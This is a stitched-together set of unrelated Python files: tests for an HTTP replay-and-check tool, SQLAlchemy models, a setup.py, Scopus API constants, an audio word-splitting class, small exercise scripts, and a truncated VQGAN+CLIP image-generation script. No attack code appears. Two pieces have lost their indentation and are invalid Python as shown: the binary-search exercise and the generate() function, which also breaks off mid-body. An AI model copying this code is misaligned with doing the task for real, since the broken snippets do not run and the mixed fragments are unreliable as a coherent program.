        "test_func1": recorder,
        "test_func2": recorder,
    })
    bs = base.Base(ctx, conf)

    recorder.expect(1)
    bs._command("test_func1", 1)
    recorder.expect(2)
    bs._command("test_func2", 2)
    assert recorder.count == 2
def test_load_and_gen_packets():
    """YAML test cases must expand into the expected .pkt file.

    uuid.uuid1 is monkey-patched with a deterministic counter so the
    generated packet file is reproducible.  Fixed: the patch is now
    restored in a finally block, so a failing assertion no longer leaks
    the fake uuid1 into later tests.
    """

    class FixUUID(object):
        # Deterministic replacement for uuid.uuid1: yields UUID(0), UUID(1), ...
        def __init__(self):
            self.number = 0

        def __call__(self):
            self.number += 1
            return uuid.UUID(int=self.number - 1)

    old_uuid1 = uuid.uuid1
    uuid.uuid1 = FixUUID()
    try:
        ctx = context.Context(broker.Broker(), traffic.Delimiter("magic"))
        ctx.broker.subscribe(broker.TOPICS.WARNING, warning_as_error)
        conf = base.BaseConf()
        bs = base.Base(ctx, conf)
        database.Sqlite3DB(ctx)
        packets_yaml = os.path.join(
            os.path.dirname(__file__), "data", "packets.yaml")
        bs._load_yaml_tests(packets_yaml)
        bs._gen_requests()
        packets_pkt = conf.pkt_path
        expect_pkt = os.path.join(
            os.path.dirname(__file__), "data", "packets.pkt")
        assert(filecmp.cmp(packets_pkt, expect_pkt))
    finally:
        # Always restore the real uuid1, even when the comparison fails.
        uuid.uuid1 = old_uuid1
def test_start_experiment():
    """End-to-end: replay the generated requests against a local HTTP
    server and verify that every stored check passes.

    NOTE(review): relies on common.HTTPServerInstance listening on
    common._PORT and on data/packets.yaml producing two requests —
    confirm against the fixtures.
    """
    # Counts how many CHECK_RESULT events were observed.
    counter = {
        "request" : 0,
    }
    def check_result(row, result):
        # Every individual check in this result must have passed.
        assert(functools.reduce(lambda x, y: x and y, result.values()))
        counter["request"] += 1
    with common.HTTPServerInstance():
        ctx = context.Context(broker.Broker(), traffic.Delimiter("magic"))
        ctx.broker.subscribe(broker.TOPICS.WARNING, warning_as_error)
        conf = base.BaseConf()
        bs = base.Base(ctx, conf)
        ctx.broker.subscribe(broker.TOPICS.CHECK_RESULT, check_result)
        # Collectors must be registered before the experiment runs so the
        # raw traffic is captured into the database.
        traffic.RawRequestCollector(ctx)
        traffic.RawResponseCollector(ctx)
        traffic.RealTrafficCollector(ctx)
        database.Sqlite3DB(ctx)
        packets_yaml = os.path.join(
            os.path.dirname(__file__), "data", "packets.yaml")
        bs._load_yaml_tests(packets_yaml)
        bs._gen_requests()
        # A return value of 0 means the whole experiment ran without errors.
        assert(bs._start_experiment("localhost:" + str(common._PORT)) == 0)
        bs._report_experiment()
        assert(counter["request"] == 2)
def test_import_log():
    """_import_log must republish each log line on the RAW_LOG topic."""

    class LogCheck(object):
        # A real file path is compared line by line; any other string is
        # treated as a single expected log line.
        def __init__(self, expected_log):
            if os.path.exists(expected_log):
                with open(expected_log, "r") as fd:
                    self.expected_log = iter(fd.readlines())
            else:
                self.expected_log = iter([expected_log])

        def __call__(self, line):
            assert line == next(self.expected_log)

        def finish(self):
            # True only when every expected line has been consumed.
            try:
                next(self.expected_log)
            except StopIteration:
                return True
            return False

    ctx = context.Context(broker.Broker())
    ctx.broker.subscribe(broker.TOPICS.WARNING, warning_as_error)
    bs = base.Base(ctx, base.BaseConf())

    # Check both a literal log line and this very file's contents.
    for source in ("test log", __file__):
        checker = LogCheck(source)
        ctx.broker.subscribe(broker.TOPICS.RAW_LOG, checker)
        bs._import_log(source)
        ctx.broker.unsubscribe(broker.TOPICS.RAW_LOG, checker)
        assert checker.finish()
def test_result_report():
    """_report_experiment evaluates each stored check against the captured
    traffic and publishes one outcome per row on CHECK_RESULT."""
    class FakeQueryResult(object):
        # Minimal stand-in for a database query result: iterable rows plus
        # the column titles that _report_experiment expects.
        def __init__(self, data):
            self.data = iter(data)
        def __iter__(self):
            for i in self.data:
                yield i
        def title(self):
            return (
                "traffic_id",
                "test_title",
                "output",
                "raw_request",
                "raw_response",
                "raw_log"
            )
    class ResultChecker(object):
        # Feeds the fake rows into any SQL_COMMAND callback and verifies
        # each CHECK_RESULT against the expected outcomes, in order.
        def __init__(self, brk, test_data, expected):
            self.test_data = iter(test_data)
            self.expected = iter(expected)
            brk.subscribe(broker.TOPICS.SQL_COMMAND, self.publish_data)
            brk.subscribe(broker.TOPICS.CHECK_RESULT, self.check)
        def publish_data(self, *args, **kwargs):
            if "callback" in kwargs:
                kwargs["callback"](FakeQueryResult(self.test_data))
        def check(self, row, result):
            assert(result == next(self.expected))
        def finish(self):
            # True only once every expected result has been consumed.
            try:
                next(self.expected)
                return False
            except StopIteration:
                return True
    ctx = context.Context(broker.Broker())
    # ctx.broker.subscribe(broker.TOPICS.WARNING, warning_as_error)
    conf = base.BaseConf()
    bs = base.Base(ctx, conf)
    # Each entry: (fake DB row matching title(), expected per-check outcome).
    # NOTE(review): the 'a\da' patterns rely on Python keeping unknown
    # escape sequences literally; raw strings would make that explicit.
    test_data = (
        (
            (
                "", "", "", "", "", ""
            ),
            {}
        ),
        (
            (
                "1", "1", "{'status' : 403}", "", "HTTP1.1 403", ""
            ),
            {"status": True}
        ),
        (
            (
                "1", "1", "{'status' : 403}", "", "HTTP1.1 200", ""
            ),
            {"status": False}
        ),
        (
            (
                "1", "1", "{'status' : [200, 404]}", "", "HTTP1.1 200", ""
            ),
            {"status": True}
        ),
        (
            (
                "1", "1", "{'log_contains' : 'a\da'}", "", "", "abcde"
            ),
            {"log_contains": False}
        ),
        (
            (
                "1", "1", "{'log_contains' : 'a\da'}", "", "", "ab[a1a]cde"
            ),
            {"log_contains": True}
        ),
        (
            (
                "1", "1", "{'no_log_contains' : 'a\da'}", "", "", "ab[a1a]cde"
            ),
            {"no_log_contains": False}
        ),
        (
            (
                "1", "1", "{'no_log_contains' : 'a\da'}", "", "", "abcdef"
            ),
            {"no_log_contains": True}
        ),
        (
            (
                "1", "1", "{'response_contains' : 'a\da'}", "", "abcdef", ""
            ),
            {"response_contains": False}
        ),
        (
            (
                "1", "1", "{'response_contains' : 'a\da'}", "", "ab[a1a]cde", ""
            ),
            {"response_contains": True}
        ),
        (
            (
                "1", "1", "{'expect_error' : True}", "", "abcdef", ""
            ),
            {"expect_error": False}
        ),
        (
            (
                "1", "1", "{'expect_error' : True}", "", "", ""
            ),
            {"expect_error": True}
        ),
    )
    rc = ResultChecker(
        ctx.broker,
        [v[0] for v in test_data],
        [v[1] for v in test_data])
    bs._report_experiment()
    assert(rc.finish())
|
def digits_product(product):
    """Return the smallest positive integer whose digits multiply to
    `product`, or -1 when no such number exists.

    Examples: 12 -> 26, 450 -> 2559, 0 -> 10, 1 -> 11, 19 -> -1.

    Fixed: the original reset its loop flag (`cont = 0`) after the first
    pass, so any product needing more than one digit factor fell out of
    the loop and returned None; it also used float division (`num /= i`).
    """
    # Single-digit products need a leading 1 to form the smallest answer
    # (and 0 -> 10, since 1 * 0 == 0).
    if product < 10:
        return 10 + product
    # Greedily strip the largest possible digit factors: big digits
    # minimise the digit count, and sorting ascending minimises the value.
    digits = []
    remaining = product
    for d in range(9, 1, -1):
        while remaining % d == 0:
            digits.append(d)
            remaining //= d
    if remaining != 1:
        # A prime factor larger than 9 survives: not a product of digits.
        return -1
    digits.sort()
    return int("".join(str(d) for d in digits))
|
from sqlalchemy import create_engine, Table, Column, Integer, String, Float
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
# Shared SQLite engine and a single module-level session used by all
# models below (NOTE(review): a global session is not thread-safe —
# confirm this module is only used from one thread).
engine = create_engine('sqlite:///database.db')
Session = sessionmaker(bind=engine)
session = Session()
# Declarative base class for the ORM models defined below.
Base = declarative_base()
class Query(Base):
    """A stored search query string."""

    __tablename__ = "query"

    id = Column(Integer, primary_key=True, nullable=False)
    query_name = Column(String(255), nullable=False)

    def __init__(self, query):
        self.query_name = query

    def save(self):
        # Persist this row through the module-level session.
        session.add(self)
        session.commit()

    @staticmethod
    def get_by_query(query):
        """Return the first stored query containing *query* as a dict
        (including its Details rows), or None when nothing matches."""
        pattern = "%{}%".format(query)
        row = session.query(Query).filter(Query.query_name.like(pattern)).first()
        if row is None:
            return None
        return {
            "id": row.id,
            "query": row.query_name,
            "details": Details.get_by_query_id(row.id),
        }
class Details(Base):
    """A single search result belonging to a stored Query."""

    __tablename__ = "details"

    id = Column(Integer, primary_key=True, nullable=False)
    author = Column(String(255), nullable=False)
    title = Column(String(1028), nullable=False)
    url = Column(String(1028), nullable=False)
    year = Column(String(1028), nullable=False)
    score = Column(Float, nullable=False)
    query_id = Column(Integer, nullable=False)

    def __init__(self, author, title, url, year, score, query_id):
        self.author = author
        self.title = title
        self.url = url
        self.year = year
        self.score = score
        self.query_id = query_id

    def save(self):
        # Persist this row through the module-level session.
        session.add(self)
        session.commit()

    @staticmethod
    def get_by_query_id(query_id):
        """Return every detail row for *query_id* as a list of dicts."""
        rows = session.query(Details).filter_by(query_id=query_id).all()
        return [
            {
                "id": row.id,
                "author": row.author,
                "title": row.title,
                "url": row.url,
                "year": row.year,
                "score": row.score,
                "query_id": row.query_id,
            }
            for row in rows
        ]
|
#
# Copyright (c) 2019-present, Prometheus Research, LLC
#
from setuptools import setup, find_packages

# Read the long description up front so the file handle is closed promptly
# (the original inline open(...).read() leaked the handle).
with open("README.rst", "r") as readme:
    long_description = readme.read()

setup(
    name="rex.notebook",
    version="1.0.0",
    description="Jupyter Notebook integration for Rex Applications",
    long_description=long_description,
    maintainer="Prometheus Research, LLC",
    maintainer_email="contact@prometheusresearch.com",
    license="Apache-2.0",
    package_dir={"": "src"},
    packages=find_packages("src"),
    namespace_packages=["rex"],
    install_requires=[
        "rex.core",
        "rex.db",
        "notebook == 6.0.0",
        "nbformat == 4.4.0",
        "nbconvert == 5.6.0",
        "nbstripout == 0.3.6",
        "pandas == 1.0.4",
        "matplotlib == 3.1.1",
        "ipykernel == 5.1.2",
        "jupyter_client == 5.3.1",
        "papermill == 1.2.0",
    ],
    entry_points={"rex.ctl": ["rex = rex.notebook.ctl"]},
    dependency_links=["https://dist.rexdb.org/packages/"],
    rex_init="rex.notebook",
)
|
# Demonstrate dict.get vs dict.setdefault lookup behaviour.
dic = {'orange': 20, 'apple': 100}
print(dic.get('orange'))            # 20 — key exists
print(dic.get('orange', 70))        # 20 — default ignored when key exists
#print(dic.get('berry', 50))
print(dic.setdefault('berry', 50))  # 50 — inserts the missing key
print(dic)
|
#######################################
# Created by Alessandro Bigiotti
# import API_KEY from my_scopus file
from my_scopus import MY_API_KEY

# --- Search endpoints (see the Elsevier developer portal docs) -------------
# Scopus API search
scopus_api_search = "http://api.elsevier.com/content/search/scopus?"
# ScienceDirect API search
science_direct_search = "http://api.elsevier.com/content/search/scidir?"

# --- Scopus retrieval endpoints --------------------------------------------
# usage pattern: <base><id>?field=field1,field2&apikey=xxxxxxxx
abstract_retrieval = "http://api.elsevier.com/content/abstract/scopus_id/"
author_retrieval = "http://api.elsevier.com/content/author/author_id/"
affiliation_retrieval = "http://api.elsevier.com/content/affiliation/eid/"

# --- ScienceDirect retrieval endpoints -------------------------------------
article_retrieve_by_pii = "http://api.elsevier.com/content/article/pii/"
article_recommendation_by_pii = "http://api.elsevier.com/content/article/recommendation/pii/"

# Request headers shared by every query.
headers = {
    'X-ELS-APIKey': MY_API_KEY,         # your API_KEY
    'X-ELS-ResourceVersion': 'XOCS',    # response type
    'Accept': 'application/json',       # application type
}
import numpy
class WordExtractor:
    """Splits an audio signal into words by flagging spans whose local
    average amplitude exceeds a noise threshold estimated from a
    background-noise sample.

    Fixes applied:
    * all window/length computations now use integer division (`//`) —
      under Python 3 the original `rate / 100` produced floats that were
      then used in list index arithmetic (TypeError);
    * `__detect_noise` filled `dp_right_len` from `dp_left_len` (copy-paste
      bug) which skewed the look-ahead averages near the end of the signal.
    """

    def __init__(self, sample):
        """Computes the noise threshold as the mean absolute amplitude of
        the given background sample."""
        avg = numpy.average(numpy.absolute(sample))
        self.noise_threshold = avg

    def detect_words(self, rate, data, hint = 0):
        """Return a list of words (each a list of samples) found in data.

        rate -- sample rate in Hz
        data -- sequence of audio samples
        hint -- expected number of words (0 = unknown)
        """
        noise_array = self.__detect_noise(rate, data)
        self.__smooth_noise(rate, noise_array)
        return self.__split_words(rate, data, noise_array, hint)

    # detect sample as noise if average in previous or following 20/40/60ms
    # is above noise threshold
    # use dynamic programming to speed up the process
    # returns array of 0s and 1s depending if sample is classified as noise
    def __detect_noise(self, rate, data):
        noise = []
        # Integer division: window_size participates in index arithmetic.
        window_size = 2 * rate // 100  # number of samples in 20ms
        n = len(data)
        # dp_left[i][j]  : sum of |data| over the last (j+1) windows before i
        # dp_right[i][j] : sum of |data| over the next (j+1) windows after i
        dp_left = [[0, 0, 0] for x in range(0, n)]
        dp_left_len = [[0, 0, 0] for x in range(0, n)]
        dp_right = [[0, 0, 0] for x in range(0, n)]
        dp_right_len = [[0, 0, 0] for x in range(0, n)]
        for i in range(1, n):
            for j in range(0, 3):
                dp_left[i][j] = dp_left[i - 1][j] + numpy.absolute(data[i - 1])
                dp_left_len[i][j] = dp_left_len[i - 1][j] + 1
                if i - (j + 1) * window_size > 0:
                    dp_left[i][j] -= numpy.absolute(
                        data[i - (j + 1) * window_size - 1])
                    dp_left_len[i][j] -= 1
        for i in reversed(range(0, n - 1)):
            for j in range(0, 3):
                dp_right[i][j] = dp_right[i + 1][j] + numpy.absolute(
                    data[i + 1])
                # Bug fix: the window length must come from dp_right_len,
                # not dp_left_len.
                dp_right_len[i][j] = dp_right_len[i + 1][j] + 1
                if i + (j + 1) * window_size < n - 1:
                    dp_right[i][j] -= numpy.absolute(
                        data[i + (j + 1) * window_size + 1])
                    dp_right_len[i][j] -= 1
        for i in range(0, n):
            if i > 0:
                avg_before = 0
                for j in range(0, 3):
                    avg_before = max(avg_before,
                        float(dp_left[i][j]) / float(dp_left_len[i][j]))
            else:
                avg_before = 0
            if i < n - 1:
                avg_after = 0
                for j in range(0, 3):
                    avg_after = max(avg_after,
                        float(dp_right[i][j]) / float(dp_right_len[i][j]))
            else:
                avg_after = 0
            if max(avg_before, avg_after) > self.noise_threshold:
                noise.append(1)
            else:
                noise.append(0)
        return noise

    # performs smoothing of noise array, decides to switch from silence to
    # noise for some interval smaller then 200ms if there is at least 3 times
    # larger noise interval before or after and at least the same on the other
    # side
    def __smooth_noise(self, rate, noise):
        window_size = 2 * rate // 10  # number of samples in 200ms
        n = len(noise)
        i = 0
        while i < n:
            if noise[i] == 0:
                # Extend over the whole silent run [i, j].
                j = i
                while j + 1 < n and noise[j + 1] == 0:
                    j += 1
                if j - i + 1 < window_size:
                    left_i = i - 1
                    while left_i - 1 >= 0 and noise[left_i - 1] == 1:
                        left_i -= 1
                    right_j = j + 1
                    while right_j + 1 < n and noise[right_j + 1] == 1:
                        right_j += 1
                    this_len = j - i + 1
                    left_len = i - left_i
                    right_len = right_j - j
                    if (min(left_len, right_len) >= this_len and
                            max(left_len, right_len) >= 3 * this_len):
                        # Short gap surrounded by much longer noise: fill it.
                        for k in range(i, j + 1):
                            noise[k] = 1
                    i = right_j + 1
                else:
                    i = j + 1
            else:
                i += 1

    # extract words depending on array of 0s and 1s
    # word must be longer then 100ms
    # if hint for number of words is passed, select that many words with
    # highest standard deviation or more if there is no significant drop
    def __split_words(self, rate, data, noise, hint):
        words = []
        min_word_length = rate // 10  # number of samples in 100ms
        last = []
        stds = []
        for i in range(0, len(data)):
            if noise[i] == 1:
                last.append(data[i])
                continue
            if len(last) >= min_word_length:
                words.append(last)
                stds.append(numpy.std(last))
            last = []
        if len(last) >= min_word_length:
            words.append(last)
            stds.append(numpy.std(last))
        if hint == 0:
            std_threshold = 0.25 * numpy.average(stds)
            return self.__filter_with_threshold(words, stds, std_threshold)
        else:
            return self.__filter_with_hint(words, stds, hint)

    # filter some words using computed standard deviation limit
    def __filter_with_threshold(self, words, stds, std_threshold):
        ret = []
        for word, std in zip(words, stds):
            if std > std_threshold:
                ret.append(word)
        return ret

    # filter using given hint for number of words
    # expect drop less than 10% to take more than hint
    def __filter_with_hint(self, words, stds, hint):
        stds.sort(reverse = True)
        if hint >= len(stds):
            return words
        limit = hint
        avg = numpy.average(stds[0 : hint])
        threshold = 0.95 * (stds[hint - 1] / avg)
        while limit < len(stds) and stds[limit] / avg > threshold:
            limit += 1
        if limit == len(stds):
            return words
        threshold = (stds[limit - 1] + stds[limit]) / 2.0
        ret = []
        for word, std in zip(words, stds):
            if std > threshold:
                ret.append(word)
        return ret
|
# import sys
# N, K = map(int, input().split())
# lst = [int(sys.stdin.readline()) for _ in range(N)]
# lst.sort()
#
# start = 1
# end = max(lst)
# answer = 0
# while (start<=end) :
# count = 0
# mid = (start+end)//2
# for i in range(N) :
# mid = int((mid/10)*10)
# count += (lst[i]//mid)
# if (count>=K) :
# start = mid+1
# answer = mid
#
# else :
# end = mid-1
# print(answer)
X, Y = map(int, input().split())
Z = (int((int(Y) / int(X)) * 100))
start = 1
end = X
ans = 0
while(start <= end) :
if (X == Y) :
ans = -1
mid = (start+end)//2
if(int((int(Y+mid)/int(X+mid)) * 100)) == Z :
start = mid+1
else :
end = mid-1
ans = int((int(Y + mid) / int(X + mid)) * 100)
if (ans == Z) :
print(-1)
else :
print(mid)
|
# Build the gift list, then apply stock/priority commands until "No Money".
gifts = input().split(' ')
while True:
    tokens = input().split(' ')
    if ' '.join(tokens) == 'No Money':
        break
    action = tokens[0]
    if action == 'OutOfStock':
        # Blank out every occurrence of the sold-out gift.
        gifts[:] = [None if gift == tokens[1] else gift for gift in gifts]
    elif action == 'Required':
        position = int(tokens[2])
        if 0 <= position < len(gifts):
            gifts[position] = tokens[1]
    elif action == 'JustInCase':
        gifts[-1] = tokens[1]
# Drop the blanked-out entries before printing.
gifts = [gift for gift in gifts if gift]
print(' '.join(gifts))
|
# Originally made by Katherine Crowson (https://github.com/crowsonkb, https://twitter.com/RiversHaveWings)
# The original BigGAN+CLIP method was by https://twitter.com/advadnoun
# Adapted from https://github.com/nerdyrodent/VQGAN-CLIP/blob/main/generate.py
import argparse
import os
import random
from urllib.request import urlopen
import imageio
import numpy as np
from pydantic import BaseModel
from tqdm import tqdm
import torch
from torch.nn import functional as F
from torchvision import transforms
from torchvision.transforms import functional as TF
from torch.cuda import get_device_properties
torch.backends.cudnn.benchmark = False # NR: True is a bit faster, but can lead to OOM. False is more deterministic.
#torch.use_deterministic_algorithms(True) # NR: grid_sampler_2d_backward_cuda does not have a deterministic implementation
from PIL import ImageFile, Image, PngImagePlugin, ImageChops
ImageFile.LOAD_TRUNCATED_IMAGES = True
from subprocess import Popen, PIPE
import re
from model.utils import *
IMAGE_SIZE = 128
class Args(BaseModel):
    """Default generation settings (mirrors the argparse options defined
    in generate() below)."""
    prompts: str = None
    image_prompts: list = []
    size: list = [IMAGE_SIZE, IMAGE_SIZE]
    init_image: str = None
    init_noise: str = None
    init_weight: float = 0.
    clip_model: str = "ViT-B/32"
    vqgan_config: str = "model/checkpoints/vqgan_imagenet_f16_16384.yaml"
    # Bug fix: this previously pointed at the .yaml config file; the
    # checkpoint must be the .ckpt weights file (matches the load_model
    # default and the argparse default).
    vqgan_checkpoint: str = "model/checkpoints/vqgan_imagenet_f16_16384.ckpt"
    noise_prompt_seeds: list = []
    noise_prompt_weights: list = []
    step_size: float = 0.1
    cut_method: str = "latest"
    cutn: int = 32
    cut_pow: float = 1.
    seed: int = None
    optimiser: str = "Adam"
    output: str = "output.png"
    make_video: bool = False
    make_zoom_video: bool = False
    zoom_start: int = 0
    zoom_frequency: int = 10
    zoom_scale: float = 0.99
    zoom_shift_x: int = 0
    zoom_shift_y: int = 0
    prompt_frequency: int = 0
    video_length: float = 10.
    output_video_fps: float = 0.
    input_video_fps: float = 15.
    cudnn_determinism: bool = False
    augments: list = []
    video_style_dir: str = None
    cuda_device: str = "cuda:0"
def load_model(cuda_device=0, vqgan_config="model/checkpoints/vqgan_imagenet_f16_16384.yaml", vqgan_checkpoint="model/checkpoints/vqgan_imagenet_f16_16384.ckpt"):
    """Load the VQGAN model from config/checkpoint and move it onto the device."""
    target_device = torch.device(cuda_device)
    vqgan = load_vqgan_model(vqgan_config, vqgan_checkpoint, gumbel=False)
    return vqgan.to(target_device)
def load_perceptor(cuda_device=0, clip_model="ViT-B/32"):
    """Load the CLIP perceptor in eval mode with gradients disabled.

    JIT is only used on torch < 1.8.  Fixed: the original parsed the
    version with float(torch.__version__[:3]), which misreads "1.10.0"
    as 1.1 and crashes on local suffixes like "2.0.1+cu118".
    """
    device = torch.device(cuda_device)
    version = tuple(int(part) for part in torch.__version__.split("+")[0].split(".")[:2])
    jit = version < (1, 8)
    return clip.load(clip_model, jit=jit)[0].eval().requires_grad_(False).to(device)
def generate(
model,
perceptor,
output_path="output.png",
cuda_device="cuda:0",
prompts=None,
iterations=500,
save_every=500,
size=[IMAGE_SIZE, IMAGE_SIZE],
gumbel=False,
):
# Create the parser
vq_parser = argparse.ArgumentParser(description='Image generation using VQGAN+CLIP')
# Add the arguments
vq_parser.add_argument("-p", "--prompts", type=str, help="Text prompts", default=None, dest='prompts')
vq_parser.add_argument("-ip", "--image_prompts", type=str, help="Image prompts / target image", default=[], dest='image_prompts')
vq_parser.add_argument("-s", "--size", nargs=2, type=int, help="Image size (width height) (default: %(default)s)", default=[IMAGE_SIZE,IMAGE_SIZE], dest='size')
vq_parser.add_argument("-ii", "--init_image", type=str, help="Initial image", default=None, dest='init_image')
vq_parser.add_argument("-in", "--init_noise", type=str, help="Initial noise image (pixels or gradient)", default=None, dest='init_noise')
vq_parser.add_argument("-iw", "--init_weight", type=float, help="Initial weight", default=0., dest='init_weight')
vq_parser.add_argument("-m", "--clip_model", type=str, help="CLIP model (e.g. ViT-B/32, ViT-B/16)", default='ViT-B/32', dest='clip_model')
vq_parser.add_argument("-conf", "--vqgan_config", type=str, help="VQGAN config", default=f'checkpoints/vqgan_imagenet_f16_16384.yaml', dest='vqgan_config')
vq_parser.add_argument("-ckpt", "--vqgan_checkpoint", type=str, help="VQGAN checkpoint", default=f'checkpoints/vqgan_imagenet_f16_16384.ckpt', dest='vqgan_checkpoint')
vq_parser.add_argument("-nps", "--noise_prompt_seeds", nargs="*", type=int, help="Noise prompt seeds", default=[], dest='noise_prompt_seeds')
vq_parser.add_argument("-npw", "--noise_prompt_weights", nargs="*", type=float, help="Noise prompt weights", default=[], dest='noise_prompt_weights')
vq_parser.add_argument("-lr", "--learning_rate", type=float, help="Learning rate", default=0.1, dest='step_size')
vq_parser.add_argument("-cutm", "--cut_method", type=str, help="Cut method", choices=['original','updated','nrupdated','updatedpooling','latest'], default='latest', dest='cut_method')
vq_parser.add_argument("-cuts", "--num_cuts", type=int, help="Number of cuts", default=32, dest='cutn')
vq_parser.add_argument("-cutp", "--cut_power", type=float, help="Cut power", default=1., dest='cut_pow')
vq_parser.add_argument("-sd", "--seed", type=int, help="Seed", default=None, dest='seed')
vq_parser.add_argument("-opt", "--optimiser", type=str, help="Optimiser", choices=['Adam','AdamW','Adagrad','Adamax','DiffGrad','AdamP','RAdam','RMSprop'], default='Adam', dest='optimiser')
vq_parser.add_argument("-o", "--output", type=str, help="Output filename", default="output.png", dest='output')
vq_parser.add_argument("-vid", "--video", action='store_true', help="Create video frames?", dest='make_video')
vq_parser.add_argument("-zvid", "--zoom_video", action='store_true', help="Create zoom video?", dest='make_zoom_video')
vq_parser.add_argument("-zs", "--zoom_start", type=int, help="Zoom start iteration", default=0, dest='zoom_start')
vq_parser.add_argument("-zse", "--zoom_save_every", type=int, help="Save zoom image iterations", default=10, dest='zoom_frequency')
vq_parser.add_argument("-zsc", "--zoom_scale", type=float, help="Zoom scale %", default=0.99, dest='zoom_scale')
vq_parser.add_argument("-zsx", "--zoom_shift_x", type=int, help="Zoom shift x (left/right) amount in pixels", default=0, dest='zoom_shift_x')
vq_parser.add_argument("-zsy", "--zoom_shift_y", type=int, help="Zoom shift y (up/down) amount in pixels", default=0, dest='zoom_shift_y')
vq_parser.add_argument("-cpe", "--change_prompt_every", type=int, help="Prompt change frequency", default=0, dest='prompt_frequency')
vq_parser.add_argument("-vl", "--video_length", type=float, help="Video length in seconds (not interpolated)", default=10, dest='video_length')
vq_parser.add_argument("-ofps", "--output_video_fps", type=float, help="Create an interpolated video (Nvidia GPU only) with this fps (min 10. best set to 30 or 60)", default=0, dest='output_video_fps')
vq_parser.add_argument("-ifps", "--input_video_fps", type=float, help="When creating an interpolated video, use this as the input fps to interpolate from (>0 & <ofps)", default=15, dest='input_video_fps')
vq_parser.add_argument("-d", "--deterministic", action='store_true', help="Enable cudnn.deterministic?", dest='cudnn_determinism')
vq_parser.add_argument("-aug", "--augments", nargs='+', action='append', type=str, choices=['Ji','Sh','Gn','Pe','Ro','Af','Et','Ts','Cr','Er','Re'], help="Enabled augments (latest vut method only)", default=[], dest='augments')
vq_parser.add_argument("-vsd", "--video_style_dir", type=str, help="Directory with video frames to style", default=None, dest='video_style_dir')
vq_parser.add_argument("-cd", "--cuda_device", type=str, help="Cuda device to use", default="cuda:0", dest='cuda_device')
# Execute the parse_args() method
# args = vq_parser.parse_args()
args = Args()
if not prompts and not args.image_prompts:
raise Exception("No prompt received")
if args.cudnn_determinism:
torch.backends.cudnn.deterministic = True
if not args.augments:
args.augments = [['Af', 'Pe', 'Ji', 'Er']]
# Split text prompts using the pipe character (weights are split later)
if prompts:
# For stories, there will be many phrases
story_phrases = [phrase.strip() for phrase in prompts.split("^")]
# Make a list of all phrases
all_phrases = []
for phrase in story_phrases:
all_phrases.append(phrase.split("|"))
# First phrase
prompts = all_phrases[0]
# Split target images using the pipe character (weights are split later)
if args.image_prompts:
args.image_prompts = args.image_prompts.split("|")
args.image_prompts = [image.strip() for image in args.image_prompts]
if args.make_video and args.make_zoom_video:
print("Warning: Make video and make zoom video are mutually exclusive.")
args.make_video = False
# Make video steps directory
if args.make_video or args.make_zoom_video:
if not os.path.exists('steps'):
os.mkdir('steps')
# Fallback to CPU if CUDA is not found and make sure GPU video rendering is also disabled
# NB. May not work for AMD cards?
if not args.cuda_device == 'cpu' and not torch.cuda.is_available():
args.cuda_device = 'cpu'
args.video_fps = 0
print("Warning: No GPU found! Using the CPU instead. The iterations will be slow.")
print("Perhaps CUDA/ROCm or the right pytorch version is not properly installed?")
# If a video_style_dir has been, then create a list of all the images
if args.video_style_dir:
print("Locating video frames...")
video_frame_list = []
for entry in os.scandir(args.video_style_dir):
if (entry.path.endswith(".jpg")
or entry.path.endswith(".png")) and entry.is_file():
video_frame_list.append(entry.path)
# Reset a few options - same filename, different directory
if not os.path.exists('steps'):
os.mkdir('steps')
args.init_image = video_frame_list[0]
filename = os.path.basename(args.init_image)
cwd = os.getcwd()
output_path = os.path.join(cwd, "steps", filename)
num_video_frames = len(video_frame_list) # for video styling
device = torch.device(cuda_device)
# clock=deepcopy(perceptor.visual.positional_embedding.data)
# perceptor.visual.positional_embedding.data = clock/clock.max()
# perceptor.visual.positional_embedding.data=clamp_with_grad(clock,0,1)
cut_size = perceptor.visual.input_resolution
f = 2**(model.decoder.num_resolutions - 1)
# Cutout class options:
# 'latest','original','updated' or 'updatedpooling'
if args.cut_method == 'latest':
make_cutouts = MakeCutouts(args, cut_size, args.cutn, cut_pow=args.cut_pow)
elif args.cut_method == 'original':
make_cutouts = MakeCutoutsOrig(args, cut_size, args.cutn, cut_pow=args.cut_pow)
elif args.cut_method == 'updated':
make_cutouts = MakeCutoutsUpdate(args, cut_size, args.cutn, cut_pow=args.cut_pow)
elif args.cut_method == 'nrupdated':
make_cutouts = MakeCutoutsNRUpdate(args, cut_size, args.cutn, cut_pow=args.cut_pow)
else:
make_cutouts = MakeCutoutsPoolingUpdate(args, cut_size, args.cutn, cut_pow=args.cut_pow)
toksX, toksY = size[0] // f, size[1] // f
sideX, sideY = toksX * f, toksY * f
# Gumbel or not?
if gumbel:
e_dim = 256
n_toks = model.quantize.n_embed
z_min = model.quantize.embed.weight.min(dim=0).values[None, :, None, None]
z_max = model.quantize.embed.weight.max(dim=0).values[None, :, None, None]
else:
e_dim = model.quantize.e_dim
n_toks = model.quantize.n_e
z_min = model.quantize.embedding.weight.min(dim=0).values[None, :, None, None]
z_max = model.quantize.embedding.weight.max(dim=0).values[None, :, None, None]
if args.init_image:
if 'http' in args.init_image:
img = Image.open(urlopen(args.init_image))
else:
img = Image.open(args.init_image)
pil_image = img.convert('RGB')
pil_image = pil_image.resize((sideX, sideY), Image.LANCZOS)
pil_tensor = TF.to_tensor(pil_image)
z, *_ = model.encode(pil_tensor.to(device).unsqueeze(0) * 2 - 1)
elif args.init_noise == 'pixels':
img = random_noise_image(size[0], size[1])
pil_image = img.convert('RGB')
pil_image = pil_image.resize((sideX, sideY), Image.LANCZOS)
pil_tensor = TF.to_tensor(pil_image)
z, *_ = model.encode(pil_tensor.to(device).unsqueeze(0) * 2 - 1)
elif args.init_noise == 'gradient':
img = random_gradient_image(size[0], size[1])
pil_image = img.convert('RGB')
pil_image = pil_image.resize((sideX, sideY), Image.LANCZOS)
pil_tensor = TF.to_tensor(pil_image)
z, *_ = model.encode(pil_tensor.to(device).unsqueeze(0) * 2 - 1)
else:
one_hot = F.one_hot(torch.randint(n_toks, [toksY * toksX], device=device), n_toks).float()
# z = one_hot @ model.quantize.embedding.weight
if gumbel:
z = one_hot @ model.quantize.embed.weight
else:
z = one_hot @ model.quantize.embedding.weight
z = z.view([-1, toksY, toksX, e_dim]).permute(0, 3, 1, 2)
#z = torch.rand_like(z)*2 # NR: check
z_orig = z.clone()
z.requires_grad_(True)
pMs = []
normalize = transforms.Normalize(mean=[0.48145466, 0.4578275, 0.40821073],
std=[0.26862954, 0.26130258, 0.27577711])
# From imagenet - Which is better?
